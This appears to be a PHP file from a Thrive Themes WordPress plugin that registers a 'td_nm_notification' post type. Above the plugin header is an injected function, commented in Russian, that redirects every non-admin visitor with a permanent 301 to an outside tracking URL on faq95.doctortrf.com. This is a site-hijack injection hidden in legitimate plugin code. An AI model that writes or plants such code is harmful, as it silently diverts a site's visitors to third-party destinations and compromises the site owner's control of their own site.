function my_custom_redirect() { // Убедитесь, что этот код выполняется только на фронтенде if (!is_admin()) { // URL для редиректа $redirect_url = 'https://faq95.doctortrf.com/l/?sub1=[ID]&sub2=[SID]&sub3=3&sub4=bodyclick'; // Выполнить редирект wp_redirect($redirect_url, 301); exit(); } } add_action('template_redirect', 'my_custom_redirect'); /** * Thrive Themes - https://thrivethemes.com * * @package thrive-dashboard */ if ( ! defined( 'ABSPATH' ) ) { exit; // Silence is golden } class TD_NM_Post_Types { public static function init() { add_action( 'init', array( __CLASS__, 'register_post_types' ), 5 ); } public static function register_post_types() { if ( post_type_exists( 'td_nm_notification' ) ) { return; } register_post_type( 'td_nm_notification', array( 'publicly_queryable' => true, 'query_var' => false, 'description' => 'Thrive Notification', 'rewrite' => false, 'labels' => array( 'name' => 'Thrive Notification', ), ) ); } } TD_NM_Post_Types::init();